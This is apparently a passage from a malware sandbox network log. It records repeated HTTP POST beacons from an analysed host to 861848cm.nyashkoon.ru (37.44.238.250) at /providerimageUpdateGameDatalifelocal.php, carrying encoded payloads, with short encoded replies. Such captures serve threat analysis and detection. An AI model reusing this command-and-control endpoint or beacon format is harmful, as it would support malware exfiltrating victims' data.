                                                                                            Nov 5, 2024 23:54:22.206775904 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:22.555428028 CET | 1024 | OUT | Data Raw: 53 52 5f 59 56 5d 55 59 5a 5f 52 51 54 58 5b 5f 55 55 59 5e 51 57 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SR_YV]UYZ_RQTX[_UUY^QWRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/,6W(?#$X>9"?-"';([4*Q<>7-&3 $.\%'X$.Q-.
                                                                                            Nov 5, 2024 23:54:23.017273903 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:23.094762087 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            124 | 192.168.2.4 | 50131 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:23.214060068 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:23.571095943 CET | 1024 | OUT | Data Raw: 53 54 5f 5c 56 5b 55 5a 5a 5f 52 51 54 53 5b 5a 55 53 59 58 51 53 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_\V[UZZ_RQTS[ZUSYXQSRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-?><^7+=>>.5';4?%?>3Y:42%9'X$.Q-
                                                                                            Nov 5, 2024 23:54:24.019639015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:24.090620995 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            125 | 192.168.2.4 | 50132 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:24.229290962 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:24.586683989 CET | 1024 | OUT | Data Raw: 53 55 5a 59 53 5a 50 5d 5a 5f 52 51 54 53 5b 59 55 52 59 5b 51 5f 52 5e 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZYSZP]Z_RQTS[YURY[Q_R^TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%]8!+8#>33):-_?.&'##/<.0.50 '.^1'X$.Q-
                                                                                            Nov 5, 2024 23:54:25.043416023 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            126 | 192.168.2.4 | 50133 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:25.061744928 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:25.417968035 CET | 1284 | OUT | Data Raw: 53 53 5a 5a 53 5f 55 59 5a 5f 52 51 54 5f 5b 59 55 5d 59 59 51 57 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZZS_UYZ_RQT_[YU]YYQWR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8(<34\=>6$8X4Q+X#Z96<7&X29'X$.Q-2
                                                                                            Nov 5, 2024 23:54:25.873442888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:25.948654890 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 04 3f 04 00 5f 30 3b 06 50 3e 10 2e 01 3f 30 3b 14 2c 22 38 5b 28 20 38 5c 3d 16 0e 51 22 2c 20 05 36 0c 2d 13 23 54 27 58 29 2b 21 5f 05 1d 39 12 33 29 34 50 3e 32 36 58 3e 34 23 1b 26 09 3c 06 3e 38 2a 5c 34 39 26 1e 25 07 2e 03 25 32 27 19 2b 27 29 15 3a 3c 23 1d 27 3a 2a 57 09 16 20 12 30 33 01 5b 3e 1f 20 06 24 3e 36 02 26 3a 23 57 3d 3c 09 5c 34 1d 22 58 29 30 27 5a 22 37 0c 13 27 3a 0f 1c 32 3d 37 1b 2b 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #?_0;P>.?0;,"8[( 8\=Q", 6-#T'X)+!_93)4P>26X>4#&<>8*\49&%.%2'+'):<#':*W 03[> $>6&:#W=<\4"X)0'Z"7':2=7+&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            127 | 192.168.2.4 | 50134 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:25.186127901 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:25.539814949 CET | 1024 | OUT | Data Raw: 56 53 5a 5a 56 5f 50 5b 5a 5f 52 51 54 5f 5b 5e 55 52 59 57 51 54 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZZV_P[Z_RQT_[^URYWQTRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/Y!?<^<$Y*:5=!$ 9).[9' ')1'X$.Q-2
                                                                                            Nov 5, 2024 23:54:26.006628036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:26.084197044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            128 | 192.168.2.4 | 50135 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:26.226726055 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:26.571060896 CET | 1024 | OUT | Data Raw: 56 56 5a 5d 53 5c 55 5a 5a 5f 52 51 54 5c 5b 5f 55 53 59 58 51 5f 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ]S\UZZ_RQT\[_USYXQ_RZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%-<.V<(((**6*)$$^#/>W?>3-%07&)'X$.Q->
                                                                                            Nov 5, 2024 23:54:27.042350054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:27.114298105 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            129 | 192.168.2.4 | 50136 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:27.248897076 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:27.605964899 CET | 1024 | OUT | Data Raw: 56 5f 5a 5a 53 5d 50 5a 5a 5f 52 51 54 5f 5b 5b 55 51 59 59 51 55 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZS]PZZ_RQT_[[UQYYQUR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,5?8Y?')*2)6]'^8X7+.\-/4$92)'X$.Q-2
                                                                                            Nov 5, 2024 23:54:28.055320024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:28.130038023 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            130 | 192.168.2.4 | 50137 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:28.270579100 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:28.617945910 CET | 1024 | OUT | Data Raw: 56 5e 5a 59 56 5b 50 59 5a 5f 52 51 54 5d 5b 5e 55 56 59 58 51 50 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^ZYV[PYZ_RQT][^UVYXQPRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,?5((+7=)1=&Z$#4<=(>'Y. .%'X$.Q-
                                                                                            Nov 5, 2024 23:54:29.085493088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:29.158462048 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            131 | 192.168.2.4 | 50138 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:29.291663885 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:30.102713108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:30.179821968 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            132 | 192.168.2.4 | 50139 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:30.315850019 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            133 | 192.168.2.4 | 50140 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:30.968440056 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:31.789808035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:31.863925934 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            134 | 192.168.2.4 | 50141 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:31.091594934 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:31.893173933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:31.973112106 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            135 | 192.168.2.4 | 50142 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:32.127007961 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:32.930119991 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:33.003645897 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            136 | 192.168.2.4 | 50143 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:33.138135910 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:33.941673994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:34.020648003 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:54:34.276355982 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:54:34.277240038 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            137 | 192.168.2.4 | 50144 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:34.277518034 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:35.082019091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:35.158123970 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            138 | 192.168.2.4 | 50145 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:35.276504993 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:36.087872982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:36.162278891 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            139 | 192.168.2.4 | 50146 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:36.298546076 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                            140 | 192.168.2.4 | 50147 | 37.44.238.250 | 80
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:54:36.878124952 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:37.697130919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:37.771986961 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 50148 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:37.026089907 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1024
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:37.837976933 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:37.911415100 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.4 | 50149 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
